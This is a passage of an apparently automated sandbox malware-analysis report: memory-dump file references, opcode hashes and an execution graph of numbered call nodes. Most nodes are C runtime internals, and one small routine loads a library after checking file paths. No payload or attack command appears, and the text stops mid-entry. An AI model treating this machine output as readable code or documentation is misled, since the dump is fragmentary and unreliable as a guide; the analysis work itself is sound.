                                                • __lock.LIBCMT ref: 00713E45
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 3521780317-0
                                                • Opcode ID: 47388e196234253acc81e9106d1960a848ece670871485aab4be61be0dafa70f
                                                • Instruction ID: bd6c06169d36d8ca834de2483ca2268d5181be520a789cdccfc664c47e33c3c3
                                                • Opcode Fuzzy Hash: 47388e196234253acc81e9106d1960a848ece670871485aab4be61be0dafa70f
                                                • Instruction Fuzzy Hash: E1F09032900301DBE720BB7C980B7CD72A0AF44B20F108149E455976D2CB7C9AD68B52

                                                Execution Graph

                                                Execution Coverage:6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:1047
                                                Total number of Limit Nodes:29
                                                execution_graph 3954 1f2d3f 3955 1f3730 __calloc_crt 66 API calls 3954->3955 3956 1f2d4b 3955->3956 3957 1f207e __encode_pointer 6 API calls 3956->3957 3958 1f2d53 3957->3958 3992 1f235f 3993 1f236b __mtinitlocknum 3992->3993 3994 1f2383 3993->3994 3995 1f35ee __freea 66 API calls 3993->3995 3997 1f246d __mtinitlocknum 3993->3997 3996 1f2391 3994->3996 3998 1f35ee __freea 66 API calls 3994->3998 3995->3994 3999 1f239f 3996->3999 4001 1f35ee __freea 66 API calls 3996->4001 3998->3996 4000 1f23ad 3999->4000 4002 1f35ee __freea 66 API calls 3999->4002 4003 1f35ee __freea 66 API calls 4000->4003 4005 1f23bb 4000->4005 4001->3999 4002->4000 4003->4005 4004 1f23c9 4007 1f23d7 4004->4007 4009 1f35ee __freea 66 API calls 4004->4009 4005->4004 4006 1f35ee __freea 66 API calls 4005->4006 4006->4004 4008 1f23e8 4007->4008 4010 1f35ee __freea 66 API calls 4007->4010 4011 1f2aa0 __lock 66 API calls 4008->4011 4009->4007 4010->4008 4012 1f23f0 4011->4012 4013 1f23fc InterlockedDecrement 4012->4013 4014 1f2415 4012->4014 4013->4014 4015 1f2407 4013->4015 4028 1f2479 4014->4028 4015->4014 4018 1f35ee __freea 66 API calls 4015->4018 4018->4014 4019 1f2aa0 __lock 66 API calls 4020 1f2429 4019->4020 4021 1f245a 4020->4021 4031 1f3d2d 4020->4031 4075 1f2485 4021->4075 4025 1f35ee __freea 66 API calls 4025->3997 4078 1f29c6 LeaveCriticalSection 4028->4078 4030 1f2422 4030->4019 4032 1f3d3e InterlockedDecrement 4031->4032 4033 1f243e 4031->4033 4034 1f3d56 4032->4034 4035 1f3d53 InterlockedDecrement 4032->4035 4033->4021 4045 1f3b55 4033->4045 4036 1f3d63 4034->4036 4037 1f3d60 InterlockedDecrement 4034->4037 4035->4034 4038 1f3d6d InterlockedDecrement 4036->4038 4039 1f3d70 4036->4039 4037->4036 4038->4039 4040 1f3d7d 4039->4040 4041 1f3d7a InterlockedDecrement 4039->4041 4042 1f3d96 InterlockedDecrement 4040->4042 4043 1f3da6 InterlockedDecrement 4040->4043 4044 1f3db1 InterlockedDecrement 4040->4044 4041->4040 4042->4040 4043->4040 4044->4033 4046 1f3bd9 4045->4046 4049 1f3b6c 4045->4049 4047 1f35ee __freea 66 API calls 4046->4047 4048 1f3c26 4046->4048 4051 1f3bfa 4047->4051 4060 1f3c4d 4048->4060 4103 1f5ae1 4048->4103 4049->4046 4055 1f35ee __freea 66 API calls 4049->4055 4057 1f3ba0 4049->4057 4053 1f35ee __freea 66 API calls 4051->4053 4058 1f3c0d 4053->4058 4054 1f35ee __freea 66 API calls 4054->4060 4061 1f3b95 4055->4061 4056 1f3c92 4062 1f35ee __freea 66 API calls 4056->4062 4063 1f35ee __freea 66 API calls 4057->4063 4074 1f3bc1 4057->4074 4064 1f35ee __freea 66 API calls 4058->4064 4059 1f35ee __freea 66 API calls 4065 1f3bce 4059->4065 4060->4056 4071 1f35ee 66 API calls __freea 4060->4071 4079 1f5cbb 4061->4079 4068 1f3c98 4062->4068 4069 1f3bb6 4063->4069 4070 1f3c1b 4064->4070 4066 1f35ee __freea 66 API calls 4065->4066 4066->4046 4068->4021 4095 1f5c76 4069->4095 4073 1f35ee __freea 66 API calls 4070->4073 4071->4060 4073->4048 4074->4059 4191 1f29c6 LeaveCriticalSection 4075->4191 4077 1f2467 4077->4025 4078->4030 4080 1f5cc8 4079->4080 4094 1f5d45 4079->4094 4081 1f5cd9 4080->4081 4082 1f35ee __freea 66 API calls 4080->4082 4083 1f5ceb 4081->4083 4084 1f35ee __freea 66 API calls 4081->4084 4082->4081 4085 1f35ee __freea 66 API calls 4083->4085 4086 1f5cfd 4083->4086 4084->4083 4085->4086 4087 1f5d0f 4086->4087 4088 1f35ee __freea 66 API calls 4086->4088 4089 1f5d21 4087->4089 4090 1f35ee __freea 66 API calls 4087->4090 4088->4087 4091 1f5d33 4089->4091 4092 1f35ee __freea 66 API calls 4089->4092 4090->4089 4093 1f35ee __freea 66 API calls 4091->4093 4091->4094 4092->4091 4093->4094 4094->4057 4096 1f5c83 4095->4096 4102 1f5cb7 4095->4102 4097 1f5c93 4096->4097 4098 1f35ee __freea 66 API calls 4096->4098 4099 1f5ca5 4097->4099 4100 1f35ee __freea 66 API calls 4097->4100 4098->4097 4101 1f35ee __freea 66 API calls 4099->4101 4099->4102 4100->4099 4101->4102 4102->4074 4104 1f5af2 4103->4104 4190 1f3c46 4103->4190 4105 1f35ee __freea 66 API calls 4104->4105 4106 1f5afa 4105->4106 4107 1f35ee __freea 66 API calls 4106->4107 4108 1f5b02 4107->4108 4109 1f35ee __freea 66 API calls 4108->4109 4110 1f5b0a 4109->4110 4111 1f35ee __freea 66 API calls 4110->4111 4112 1f5b12 4111->4112 4113 1f35ee __freea 66 API calls 4112->4113 4114 1f5b1a 4113->4114 4115 1f35ee __freea 66 API calls 4114->4115 4116 1f5b22 4115->4116 4117 1f35ee __freea 66 API calls 4116->4117 4118 1f5b29 4117->4118 4119 1f35ee __freea 66 API calls 4118->4119 4120 1f5b31 4119->4120 4121 1f35ee __freea 66 API calls 4120->4121 4122 1f5b39 4121->4122 4123 1f35ee __freea 66 API calls 4122->4123 4124 1f5b41 4123->4124 4125 1f35ee __freea 66 API calls 4124->4125 4126 1f5b49 4125->4126 4127 1f35ee __freea 66 API calls 4126->4127 4128 1f5b51 4127->4128 4129 1f35ee __freea 66 API calls 4128->4129 4130 1f5b59 4129->4130 4131 1f35ee __freea 66 API calls 4130->4131 4132 1f5b61 4131->4132 4133 1f35ee __freea 66 API calls 4132->4133 4134 1f5b69 4133->4134 4135 1f35ee __freea 66 API calls 4134->4135 4136 1f5b71 4135->4136 4137 1f35ee __freea 66 API calls 4136->4137 4138 1f5b7c 4137->4138 4139 1f35ee __freea 66 API calls 4138->4139 4140 1f5b84 4139->4140 4141 1f35ee __freea 66 API calls 4140->4141 4142 1f5b8c 4141->4142 4143 1f35ee __freea 66 API calls 4142->4143 4144 1f5b94 4143->4144 4145 1f35ee __freea 66 API calls 4144->4145 4146 1f5b9c 4145->4146 4147 1f35ee __freea 66 API calls 4146->4147 4148 1f5ba4 4147->4148 4149 1f35ee __freea 66 API calls 4148->4149 4150 1f5bac 4149->4150 4151 1f35ee __freea 66 API calls 4150->4151 4152 1f5bb4 4151->4152 4153 1f35ee __freea 66 API calls 4152->4153 4154 1f5bbc 4153->4154 4155 1f35ee __freea 66 API calls 4154->4155 4156 1f5bc4 4155->4156 4157 1f35ee __freea 66 API calls 4156->4157 4158 1f5bcc 4157->4158 4159 1f35ee __freea 66 API calls 4158->4159 4160 1f5bd4 4159->4160 4161 1f35ee __freea 66 API calls 4160->4161 4162 1f5bdc 4161->4162 4163 1f35ee __freea 66 API calls 4162->4163 4164 1f5be4 4163->4164 4165 1f35ee __freea 66 API calls 4164->4165 4166 1f5bec 4165->4166 4167 1f35ee __freea 66 API calls 4166->4167 4168 1f5bf4 4167->4168 4169 1f35ee __freea 66 API calls 4168->4169 4170 1f5c02 4169->4170 4171 1f35ee __freea 66 API calls 4170->4171 4172 1f5c0d 4171->4172 4173 1f35ee __freea 66 API calls 4172->4173 4174 1f5c18 4173->4174 4175 1f35ee __freea 66 API calls 4174->4175 4176 1f5c23 4175->4176 4177 1f35ee __freea 66 API calls 4176->4177 4178 1f5c2e 4177->4178 4179 1f35ee __freea 66 API calls 4178->4179 4180 1f5c39 4179->4180 4181 1f35ee __freea 66 API calls 4180->4181 4182 1f5c44 4181->4182 4183 1f35ee __freea 66 API calls 4182->4183 4184 1f5c4f 4183->4184 4185 1f35ee __freea 66 API calls 4184->4185 4186 1f5c5a 4185->4186 4187 1f35ee __freea 66 API calls 4186->4187 4188 1f5c65 4187->4188 4189 1f35ee __freea 66 API calls 4188->4189 4189->4190 4190->4054 4191->4077 4429 1f28fe 4430 1f2901 4429->4430 4431 1f51fb _abort 68 API calls 4430->4431 4432 1f290d __mtinitlocknum 4431->4432 3959 1f543d 3960 1f1411 __amsg_exit 66 API calls 3959->3960 3961 1f5444 3960->3961 3962 1f5138 3963 1f514a 3962->3963 3965 1f5158 @_EH4_CallFilterFunc@8 3962->3965 3964 1f10cc __crtLCMapStringA_stat 5 API calls 3963->3964 3964->3965 3966 1f31b4 3967 1f31c0 SetLastError 3966->3967 3968 1f31c8 __mtinitlocknum 3966->3968 3967->3968 3884 1f1391 3885 1f13cd 3884->3885 3886 1f13a3 3884->3886 3886->3885 3888 1f28da 3886->3888 3889 1f28e6 __mtinitlocknum 3888->3889 3894 1f2345 3889->3894 3895 1f22cc __getptd_noexit 66 API calls 3894->3895 3896 1f234d 3895->3896 3897 1f235a 3896->3897 3898 1f1411 __amsg_exit 66 API calls 3896->3898 3899 1f51fb 3897->3899 3898->3897 3900 1f521a 3899->3900 3901 1f5221 3899->3901 3902 1f1719 __NMSG_WRITE 66 API calls 3900->3902 3911 1f2f92 3901->3911 3902->3901 3905 1f5232 __crtLCMapStringA_stat 3907 1f530a 3905->3907 3909 1f52ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3905->3909 3935 1f1697 3907->3935 3909->3907 3912 1f20f9 __decode_pointer 6 API calls 3911->3912 3913 1f2f9d 3912->3913 3913->3905 3914 1f2f9f 3913->3914 3917 1f2fab __mtinitlocknum 3914->3917 3915 1f3007 3916 1f2fe8 3915->3916 3921 1f3016 3915->3921 3920 1f20f9 __decode_pointer 6 API calls 3916->3920 3917->3915 3917->3916 3918 1f2fd2 3917->3918 3922 1f2fce 3917->3922 3919 1f22cc __getptd_noexit 66 API calls 3918->3919 3923 1f2fd7 _siglookup 3919->3923 3920->3923 3924 1f2c72 _strcat_s 66 API calls 3921->3924 3922->3918 3922->3921 3926 1f307d 3923->3926 3928 1f1697 _raise 66 API calls 3923->3928 3934 1f2fe0 __mtinitlocknum 3923->3934 3925 1f301b 3924->3925 3927 1f2c0a _strcat_s 6 API calls 3925->3927 3929 1f2aa0 __lock 66 API calls 3926->3929 3930 1f3088 3926->3930 3927->3934 3928->3926 3929->3930 3931 1f20f0 __init_pointers 6 API calls 3930->3931 3932 1f30bd 3930->3932 3931->3932 3938 1f3113 3932->3938 3934->3905 3936 1f1555 _doexit 66 API calls 3935->3936 3937 1f16a8 3936->3937 3939 1f3119 3938->3939 3940 1f3120 3938->3940 3942 1f29c6 LeaveCriticalSection 3939->3942 3940->3934 3942->3940 3969 1f26b0 3970 1f26dc 3969->3970 3971 1f26e9 3969->3971 3972 1f10cc __crtLCMapStringA_stat 5 API calls 3970->3972 3973 1f10cc __crtLCMapStringA_stat 5 API calls 3971->3973 3972->3971 3982 1f26f9 __except_handler4 __IsNonwritableInCurrentImage 3973->3982 3974 1f277c 3975 1f2752 __except_handler4 3975->3974 3976 1f276c 3975->3976 3977 1f10cc __crtLCMapStringA_stat 5 API calls 3975->3977 3978 1f10cc __crtLCMapStringA_stat 5 API calls 3976->3978 3977->3976 3978->3974 3980 1f27cb __except_handler4 3981 1f27ff 3980->3981 3983 1f10cc __crtLCMapStringA_stat 5 API calls 3980->3983 3984 1f10cc __crtLCMapStringA_stat 5 API calls 3981->3984 3982->3974 3982->3975 3985 1f51ca RtlUnwind 3982->3985 3983->3981 3984->3975 3985->3980 3986 1f122e 3989 1f18fe 3986->3989 3990 1f22cc __getptd_noexit 66 API calls 3989->3990 3991 1f123f 3990->3991 3943 1f458d 3946 1f29c6 LeaveCriticalSection 3943->3946 3945 1f4594 3946->3945 4192 1f67c8 RtlUnwind 4193 1f4247 4203 1f41cb 4193->4203 4196 1f4272 setSBCS 4197 1f10cc __crtLCMapStringA_stat 5 API calls 4196->4197 4198 1f442a 4197->4198 4199 1f42b6 IsValidCodePage 4199->4196 4200 1f42c8 GetCPInfo 4199->4200 4200->4196 4202 1f42db __crtLCMapStringA_stat __setmbcp_nolock 4200->4202 4210 1f3f0d GetCPInfo 4202->4210 4220 1f4144 4203->4220 4206 1f41ea GetOEMCP 4209 1f41fa 4206->4209 4207 1f4208 4208 1f420d GetACP 4207->4208 4207->4209 4208->4209 4209->4196 4209->4199 4209->4202 4211 1f3ff3 4210->4211 4214 1f3f41 __crtLCMapStringA_stat 4210->4214 4216 1f10cc __crtLCMapStringA_stat 5 API calls 4211->4216 4275 1f5fe2 4214->4275 4218 1f409e 4216->4218 4218->4202 4219 1f6415 ___crtLCMapStringA 101 API calls 4219->4211 4221 1f4157 4220->4221 4227 1f41a4 4220->4227 4222 1f2345 __getptd 66 API calls 4221->4222 4223 1f415c 4222->4223 4224 1f4184 4223->4224 4228 1f3e04 4223->4228 4224->4227 4243 1f40a0 4224->4243 4227->4206 4227->4207 4229 1f3e10 __mtinitlocknum 4228->4229 4230 1f2345 __getptd 66 API calls 4229->4230 4231 1f3e15 4230->4231 4232 1f3e43 4231->4232 4233 1f3e27 4231->4233 4234 1f2aa0 __lock 66 API calls 4232->4234 4235 1f2345 __getptd 66 API calls 4233->4235 4236 1f3e4a 4234->4236 4238 1f3e2c 4235->4238 4259 1f3dc6 4236->4259 4240 1f3e3a __mtinitlocknum 4238->4240 4242 1f1411 __amsg_exit 66 API calls 4238->4242 4240->4224 4242->4240 4244 1f40ac __mtinitlocknum 4243->4244 4245 1f2345 __getptd 66 API calls 4244->4245 4246 1f40b1 4245->4246 4247 1f2aa0 __lock 66 API calls 4246->4247 4255 1f40c3 4246->4255 4249 1f40e1 4247->4249 4248 1f412a 4271 1f413b 4248->4271 4249->4248 4253 1f40f8 InterlockedDecrement 4249->4253 4254 1f4112 InterlockedIncrement 4249->4254 4250 1f1411 __amsg_exit 66 API calls 4252 1f40d1 __mtinitlocknum 4250->4252 4252->4227 4253->4254 4256 1f4103 4253->4256 4254->4248 4255->4250 4255->4252 4256->4254 4257 1f35ee __freea 66 API calls 4256->4257 4258 1f4111 4257->4258 4258->4254 4260 1f3dca 4259->4260 4261 1f3dfc 4259->4261 4260->4261 4262 1f3c9e ___addlocaleref 8 API calls 4260->4262 4267 1f3e6e 4261->4267 4263 1f3ddd 4262->4263 4263->4261 4264 1f3d2d ___removelocaleref 8 API calls 4263->4264 4265 1f3de8 4264->4265 4265->4261 4266 1f3b55 ___freetlocinfo 66 API calls 4265->4266 4266->4261 4270 1f29c6 LeaveCriticalSection 4267->4270 4269 1f3e75 4269->4238 4270->4269 4274 1f29c6 LeaveCriticalSection 4271->4274 4273 1f4142 4273->4255 4274->4273 4276 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4275->4276 4277 1f5ff5 4276->4277 4285 1f5e28 4277->4285 4280 1f6415 4281 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4280->4281 4282 1f6428 4281->4282 4373 1f6070 4282->4373 4286 1f5e49 GetStringTypeW 4285->4286 4287 1f5e74 4285->4287 4288 1f5e69 GetLastError 4286->4288 4289 1f5e61 4286->4289 4287->4289 4290 1f5f5b 4287->4290 4288->4287 4291 1f5ead MultiByteToWideChar 4289->4291 4308 1f5f55 4289->4308 4313 1f6b1a GetLocaleInfoA 4290->4313 4297 1f5eda 4291->4297 4291->4308 4293 1f10cc __crtLCMapStringA_stat 5 API calls 4295 1f3fae 4293->4295 4295->4280 4296 1f5eef __crtLCMapStringA_stat __alloca_probe_16 4302 1f5f28 MultiByteToWideChar 4296->4302 4296->4308 4297->4296 4300 1f54b5 _malloc 66 API calls 4297->4300 4298 1f5fac GetStringTypeA 4299 1f5fc7 4298->4299 4298->4308 4305 1f35ee __freea 66 API calls 4299->4305 4300->4296 4303 1f5f4f 4302->4303 4304 1f5f3e GetStringTypeW 4302->4304 4309 1f5446 4303->4309 4304->4303 4305->4308 4308->4293 4310 1f5463 4309->4310 4311 1f5452 4309->4311 4310->4308 4311->4310 4312 1f35ee __freea 66 API calls 4311->4312 4312->4310 4314 1f6b4d 4313->4314 4315 1f6b48 4313->4315 4344 1f6b04 4314->4344 4317 1f10cc __crtLCMapStringA_stat 5 API calls 4315->4317 4318 1f5f7f 4317->4318 4318->4298 4318->4308 4319 1f6b63 4318->4319 4320 1f6ba3 GetCPInfo 4319->4320 4321 1f6c2d 4319->4321 4322 1f6bba 4320->4322 4323 1f6c18 MultiByteToWideChar 4320->4323 4324 1f10cc __crtLCMapStringA_stat 5 API calls 4321->4324 4322->4323 4325 1f6bc0 GetCPInfo 4322->4325 4323->4321 4328 1f6bd3 _strlen 4323->4328 4326 1f5fa0 4324->4326 4325->4323 4327 1f6bcd 4325->4327 4326->4298 4326->4308 4327->4323 4327->4328 4329 1f54b5 _malloc 66 API calls 4328->4329 4333 1f6c05 __crtLCMapStringA_stat __alloca_probe_16 4328->4333 4329->4333 4330 1f6c62 MultiByteToWideChar 4331 1f6c7a 4330->4331 4332 1f6c99 4330->4332 4335 1f6c9e 4331->4335 4336 1f6c81 WideCharToMultiByte 4331->4336 4334 1f5446 __freea 66 API calls 4332->4334 4333->4321 4333->4330 4334->4321 4337 1f6cbd 4335->4337 4338 1f6ca9 WideCharToMultiByte 4335->4338 4336->4332 4339 1f3730 __calloc_crt 66 API calls 4337->4339 4338->4332 4338->4337 4340 1f6cc5 4339->4340 4340->4332 4341 1f6cce WideCharToMultiByte 4340->4341 4341->4332 4342 1f6ce0 4341->4342 4343 1f35ee __freea 66 API calls 4342->4343 4343->4332 4347 1f6f7a 4344->4347 4348 1f6f93 4347->4348 4351 1f6d4b 4348->4351 4352 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4351->4352 4355 1f6d60 4352->4355 4353 1f6d72 4354 1f2c72 _strcat_s 66 API calls 4353->4354 4356 1f6d77 4354->4356 4355->4353 4358 1f6daf 4355->4358 4357 1f2c0a _strcat_s 6 API calls 4356->4357 4362 1f6b15 4357->4362 4361 1f6df4 4358->4361 4363 1f69e5 4358->4363 4360 1f2c72 _strcat_s 66 API calls 4360->4362 4361->4360 4361->4362 4362->4315 4364 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4363->4364 4365 1f69f9 4364->4365 4366 1f6a06 4365->4366 4370 1f6acc 4365->4370 4366->4358 4369 1f5fe2 ___crtGetStringTypeA 90 API calls 4369->4366 4371 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4370->4371 4372 1f6a2e 4371->4372 4372->4369 4374 1f6091 LCMapStringW 4373->4374 4378 1f60ac 4373->4378 4375 1f60b4 GetLastError 4374->4375 4374->4378 4375->4378 4376 1f62aa 4380 1f6b1a ___ansicp 90 API calls 4376->4380 4377 1f6106 4379 1f611f MultiByteToWideChar 4377->4379 4400 1f62a1 4377->4400 4378->4376 4378->4377 4388 1f614c 4379->4388 4379->4400 4382 1f62d2 4380->4382 4381 1f10cc __crtLCMapStringA_stat 5 API calls 4383 1f3fce 4381->4383 4384 1f62eb 4382->4384 4385 1f63c6 LCMapStringA 4382->4385 4382->4400 4383->4219 4386 1f6b63 ___convertcp 73 API calls 4384->4386 4419 1f6322 4385->4419 4390 1f62fd 4386->4390 4387 1f619d MultiByteToWideChar 4391 1f61b6 LCMapStringW 4387->4391 4412 1f6298 4387->4412 4389 1f54b5 _malloc 66 API calls 4388->4389 4397 1f6165 __alloca_probe_16 4388->4397 4389->4397 4394 1f6307 LCMapStringA 4390->4394 4390->4400 4396 1f61d7 4391->4396 4391->4412 4392 1f63ed 4399 1f35ee __freea 66 API calls 4392->4399 4392->4400 4393 1f35ee __freea 66 API calls 4393->4392 4403 1f6329 4394->4403 4394->4419 4395 1f5446 __freea 66 API calls 4395->4400 4398 1f61e0 4396->4398 4402 1f6209 4396->4402 4397->4387 4397->4400 4401 1f61f2 LCMapStringW 4398->4401 4398->4412 4399->4400 4400->4381 4401->4412 4405 1f54b5 _malloc 66 API calls 4402->4405 4415 1f6224 __alloca_probe_16 4402->4415 4406 1f54b5 _malloc 66 API calls 4403->4406 4416 1f633a __crtLCMapStringA_stat __alloca_probe_16 4403->4416 4404 1f6258 LCMapStringW 4407 1f6292 4404->4407 4410 1f6270 WideCharToMultiByte 4404->4410 4405->4415 4406->4416 4408 1f5446 __freea 66 API calls 4407->4408 4408->4412 4409 1f6378 LCMapStringA 4413 1f6398 4409->4413 4414 1f6394 4409->4414 4410->4407 4412->4395 4417 1f6b63 ___convertcp 73 API calls 4413->4417 4418 1f5446 __freea 66 API calls 4414->4418 4415->4404 4415->4412 4416->4409 4416->4419 4417->4414 4418->4419 4419->4392 4419->4393 3196 1f1104 3233 1f264c 3196->3233 3198 1f1110 GetStartupInfoW 3199 1f1133 3198->3199 3234 1f261b HeapCreate 3199->3234 3202 1f1183 3236 1f248e GetModuleHandleW 3202->3236 3206 1f1194 __RTC_Initialize 3270 1f1dde 3206->3270 3207 1f10db _fast_error_exit 66 API calls 3207->3206 3209 1f11a2 3210 1f11ae GetCommandLineW 3209->3210 3344 1f1411 3209->3344 3285 1f1d81 GetEnvironmentStringsW 3210->3285 3214 1f11bd 3294 1f1cd3 GetModuleFileNameW 3214->3294 3217 1f11d2 3300 1f1aa4 3217->3300 3218 1f1411 __amsg_exit 66 API calls 3218->3217 3221 1f11e3 3313 1f14d0 3221->3313 3223 1f1411 __amsg_exit 66 API calls 3223->3221 3224 1f11ea 3225 1f1411 __amsg_exit 66 API calls 3224->3225 3226 1f11f5 __wwincmdln 3224->3226 3225->3226 3319 1f1000 CoInitialize CreateMutexW 3226->3319 3228 1f1216 3229 1f1224 3228->3229 3333 1f1681 3228->3333 3351 1f16ad 3229->3351 3232 1f1229 __mtinitlocknum 3233->3198 3235 1f1177 3234->3235 3235->3202 3336 1f10db 3235->3336 3237 1f24a9 3236->3237 3238 1f24a2 3236->3238 3240 1f24b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3237->3240 3241 1f2611 3237->3241 3354 1f13e1 3238->3354 3247 1f24fc TlsAlloc 3240->3247 3413 1f21a8 3241->3413 3245 1f254a TlsSetValue 3246 1f1189 3245->3246 3248 1f255b 3245->3248 3246->3206 3246->3207 3247->3245 3247->3246 3358 1f16cb 3248->3358 3253 1f207e __encode_pointer 6 API calls 3254 1f257b 3253->3254 3255 1f207e __encode_pointer 6 API calls 3254->3255 3256 1f258b 3255->3256 3257 1f207e __encode_pointer 6 API calls 3256->3257 3258 1f259b 3257->3258 3375 1f2924 3258->3375 3265 1f20f9 __decode_pointer 6 API calls 3266 1f25ef 3265->3266 3266->3241 3267 1f25f6 3266->3267 3395 1f21e5 3267->3395 3269 1f25fe GetCurrentThreadId 3269->3246 3740 1f264c 3270->3740 3272 1f1dea GetStartupInfoA 3273 1f3730 __calloc_crt 66 API calls 3272->3273 3280 1f1e0b 3273->3280 3274 1f2029 __mtinitlocknum 3274->3209 3275 1f1fa6 GetStdHandle 3279 1f1f70 3275->3279 3276 1f200b SetHandleCount 3276->3274 3277 1f3730 __calloc_crt 66 API calls 3277->3280 3278 1f1fb8 GetFileType 3278->3279 3279->3274 3279->3275 3279->3276 3279->3278 3283 1f317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3279->3283 3280->3274 3280->3277 3280->3279 3282 1f1ef3 3280->3282 3281 1f1f1c GetFileType 3281->3282 3282->3274 3282->3279 3282->3281 3284 1f317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3282->3284 3283->3279 3284->3282 3286 1f1d92 3285->3286 3288 1f1d96 3285->3288 3286->3214 3289 1f36eb __malloc_crt 66 API calls 3288->3289 3290 1f1db7 3289->3290 3291 1f1dbe FreeEnvironmentStringsW 3290->3291 3741 1f37f0 3290->3741 3291->3214 3295 1f1d08 _wparse_cmdline 3294->3295 3296 1f11c7 3295->3296 3297 1f1d45 3295->3297 3296->3217 3296->3218 3298 1f36eb __malloc_crt 66 API calls 3297->3298 3299 1f1d4b _wparse_cmdline 3298->3299 3299->3296 3301 1f1abc _wcslen 3300->3301 3303 1f11d8 3300->3303 3302 1f3730 __calloc_crt 66 API calls 3301->3302 3304 1f1ae0 _wcslen 3302->3304 3303->3221 3303->3223 3304->3303 3305 1f1b45 3304->3305 3307 1f3730 __calloc_crt 66 API calls 3304->3307 3308 1f1b6b 3304->3308 3311 1f1b2a 3304->3311 3745 1f367c 3304->3745 3306 1f35ee __freea 66 API calls 3305->3306 3306->3303 3307->3304 3310 1f35ee __freea 66 API calls 3308->3310 3310->3303 3311->3304 3312 1f2ae2 __invoke_watson 10 API calls 3311->3312 3312->3311 3315 1f14de __IsNonwritableInCurrentImage 3313->3315 3754 1f2dc3 3315->3754 3316 1f14fc __initterm_e 3318 1f151b __IsNonwritableInCurrentImage __initterm 3316->3318 3758 1f2dac 3316->3758 3318->3224 3320 1f101f GetLastError 3319->3320 3321 1f1035 GetCommandLineW CommandLineToArgvW 3319->3321 3320->3321 3322 1f102c 3320->3322 3323 1f1056 PathFileExistsW 3321->3323 3325 1f1067 3321->3325 3322->3228 3324 1f106e PathFileExistsW 3323->3324 3323->3325 3324->3325 3326 1f1084 LoadLibraryW 3324->3326 3325->3326 3327 1f10aa CloseHandle CoUninitialize 3326->3327 3328 1f1091 GetProcAddress 3326->3328 3329 1f10bb LocalFree 3327->3329 3330 1f10c2 3327->3330 3331 1f10a3 FreeLibrary 3328->3331 3332 1f10a1 3328->3332 3329->3330 3330->3228 3331->3327 3332->3331 3859 1f1555 3333->3859 3335 1f1692 3335->3229 3337 1f10ee 3336->3337 3338 1f10e9 3336->3338 3340 1f1719 __NMSG_WRITE 66 API calls 3337->3340 3339 1f18c4 __FF_MSGBANNER 66 API calls 3338->3339 3339->3337 3341 1f10f6 3340->3341 3342 1f1465 _fast_error_exit 3 API calls 3341->3342 3343 1f1100 3342->3343 3343->3202 3345 1f18c4 __FF_MSGBANNER 66 API calls 3344->3345 3346 1f141b 3345->3346 3347 1f1719 __NMSG_WRITE 66 API calls 3346->3347 3348 1f1423 3347->3348 3349 1f20f9 __decode_pointer 6 API calls 3348->3349 3350 1f11ad 3349->3350 3350->3210 3352 1f1555 _doexit 66 API calls 3351->3352 3353 1f16b8 3352->3353 3353->3232 3355 1f13ec Sleep GetModuleHandleW 3354->3355 3356 1f140e 3355->3356 3357 1f140a 3355->3357 3356->3237 3357->3355 3357->3356 3424 1f20f0 3358->3424 3360 1f16d3 __init_pointers __initp_misc_winsig 3427 1f2913 3360->3427 3363 1f207e __encode_pointer 6 API calls 3364 1f170f 3363->3364 3365 1f207e TlsGetValue 3364->3365 3366 1f20b7 GetModuleHandleW 3365->3366 3367 1f2096 3365->3367 3369 1f20c7 3366->3369 3370 1f20d2 GetProcAddress 3366->3370 3367->3366 3368 1f20a0 TlsGetValue 3367->3368 3373 1f20ab 3368->3373 3372 1f13e1 __crt_waiting_on_module_handle 2 API calls 3369->3372 3371 1f20af 3370->3371 3371->3253 3374 1f20cd 3372->3374 3373->3366 3373->3371 3374->3370 3374->3371 3376 1f292f 3375->3376 3378 1f25a8 3376->3378 3430 1f317c 3376->3430 3378->3241 3379 1f20f9 TlsGetValue 3378->3379 3380 1f2132 GetModuleHandleW 3379->3380 3381 1f2111 3379->3381 3383 1f214d GetProcAddress 3380->3383 3384 1f2142 3380->3384 3381->3380 3382 1f211b TlsGetValue 3381->3382 3387 1f2126 3382->3387 3386 1f212a 3383->3386 3385 1f13e1 __crt_waiting_on_module_handle 2 API calls 3384->3385 3388 1f2148 3385->3388 3386->3241 3389 1f3730 3386->3389 3387->3380 3387->3386 3388->3383 3388->3386 3391 1f3739 3389->3391 3392 1f25d5 3391->3392 3393 1f3757 Sleep 3391->3393 3435 1f557f 3391->3435 3392->3241 3392->3265 3394 1f376c 3393->3394 3394->3391 3394->3392 3719 1f264c 3395->3719 3397 1f21f1 GetModuleHandleW 3398 1f2201 3397->3398 3402 1f2207 3397->3402 3399 1f13e1 __crt_waiting_on_module_handle 2 API calls 3398->3399 3399->3402 3400 1f221f GetProcAddress GetProcAddress 3401 1f2243 3400->3401 3403 1f2aa0 __lock 62 API calls 3401->3403 3402->3400 3402->3401 3404 1f2262 InterlockedIncrement 3403->3404 3720 1f22ba 3404->3720 3407 1f2aa0 __lock 62 API calls 3408 1f2283 3407->3408 3723 1f3c9e InterlockedIncrement 3408->3723 3410 1f22a1 3735 1f22c3 3410->3735 3412 1f22ae __mtinitlocknum 3412->3269 3414 1f21be 3413->3414 3415 1f21b2 3413->3415 3417 